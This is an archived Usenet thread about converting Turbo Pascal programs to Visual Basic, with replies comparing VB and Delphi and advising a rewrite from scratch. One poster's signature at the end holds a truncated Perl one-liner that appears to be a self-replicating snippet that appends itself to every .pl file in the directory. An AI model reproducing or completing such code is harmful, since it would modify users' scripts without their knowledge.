TP Conversion to Visual Basic

I'm looking for a conversion program that will convert my Turbo Pascal
source code to VB source code. I've noticed the two seem to be compatible
when it comes to the actual sytax, even though it seems to take basic longer
to do something than in pascal. But as I don't want to get into flame wars I
am asking if someone knows of such a beast.

If not, this question is also a fact finding mission. If no one has it,
maybe I will write one. I have tons of tp programs I would love to move to
windows, and I really think Delphi is way to complicated.

Thanks in advance

Re:TP Conversion to Visual Basic

In article <SJ%y6.210032$t67.3799...@news1.rdc1.il.home.com>, Dizzi wrote:
>I'm looking for a conversion program that will convert my Turbo Pascal
>source code to VB source code. I've noticed the two seem to be compatible
>when it comes to the actual sytax, even though it seems to take basic longer
>to do something than in pascal. But as I don't want to get into flame wars I
>am asking if someone knows of such a beast.

I don't think this is possible at least not generic. Maybe some purely
cleanly written apps could be converted, but not in general.

>If not, this question is also a fact finding mission. If no one has it,
>maybe I will write one. I have tons of tp programs I would love to move to
>windows, and I really think Delphi is way to complicated.

I think Delphi is easier than VB.

Re:TP Conversion to Visual Basic

heck DELPHI is the PASCAL equalivent of VB and DELPHI is faster.
take for instance the WINSOCK control, both have exactly the same interface,
only
one is basicisch and the other is pascalisch :-)

Marco van de Voort <mar...@toad.stack.nl> schreef in berichtnieuws
slrn9cp6pp.2vu7.mar...@toad.stack.nl...

> In article <SJ%y6.210032$t67.3799...@news1.rdc1.il.home.com>, Dizzi wrote:
> >I'm looking for a conversion program that will convert my Turbo Pascal
> >source code to VB source code. I've noticed the two seem to be compatible
> >when it comes to the actual sytax, even though it seems to take basic
longer
> >to do something than in pascal. But as I don't want to get into flame
wars I
> >am asking if someone knows of such a beast.

> I don't think this is possible at least not generic. Maybe some purely
> cleanly written apps could be converted, but not in general.

> >If not, this question is also a fact finding mission. If no one has it,
> >maybe I will write one. I have tons of tp programs I would love to move
> >windows, and I really think Delphi is way to complicated.

> I think Delphi is easier than VB.

Re:TP Conversion to Visual Basic

and forgot to mention.. delphi is quite faster than VB..

Re:TP Conversion to Visual Basic

In article <986511436.13718.0.pluto.d4ee1...@news.demon.nl>, Santing, Peter
wrote:

>heck DELPHI is the PASCAL equalivent of VB and DELPHI is faster.
>take for instance the WINSOCK control, both have exactly the same interface,
>only
>one is basicisch and the other is pascalisch :-)

Yeah, but I meant more for own code. Delphi's library, the VCL is very
consistant, and easy to program.

Re:TP Conversion to Visual Basic

Hello Dizzi,
  Being a long time Pascal Programmer (starting with UCSD Pascal on the Texas
Instruments TI-99/4A and eventually making my way through TP 5.5, 6.0 and 7.0),
I thought the best path to Windows programming would be through Delphi or TPW
1.5. I was never able to make any real progress with either one and had given up
on Windows programming entirely.

  Then I found Visual Basic 4.0/32 at a computer show for only a few bucks and
within a week I knew I would finally be able to build real Windows applications.
(The company I work for has been running on my software for about 15+ years.)

  Yes, I could have eventully learned to use TPW 1.5 or Delphi - just like I
could eventually learn to use C++.  I would rather spend my time building
applications.

  As for converting Source Code, if you mean something like TPW 1.5 to VB, I
have no idea how similar they are but I doubt it can be done. If you mean TP 7.0
to VB - it just isn't possible. The two environments are simply too different to
even consider it.

  If you have programs already in use under TP and plan to move to VB, you will
find that migrating data files from TP to VB can be extremely difficult. Strings
are handled differently and you can't match up all of the data types. Using
intermediate text files can solve a lot of problems.

  My best suggestion is that you build your VB programs from scratch. Good luck.

--
Val Mehling
va...@earthlink.net

Valentine Mehling <va...@earthlink.net> wrote:
> Hello Dizzi,
>   Being a long time Pascal Programmer (starting with UCSD Pascal on the Texas
> Instruments TI-99/4A and eventually making my way through TP 5.5, 6.0 and 7.0),
> I thought the best path to Windows programming would be through Delphi or TPW
> 1.5. I was never able to make any real progress with either one and had given up
> on Windows programming entirely.

What? This is very easy in Delpi! You do exactly the same as in VB:
'paint' the interface and write Click and-so-on handlers.

--
#!/usr/bin/perl
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X

Other Threads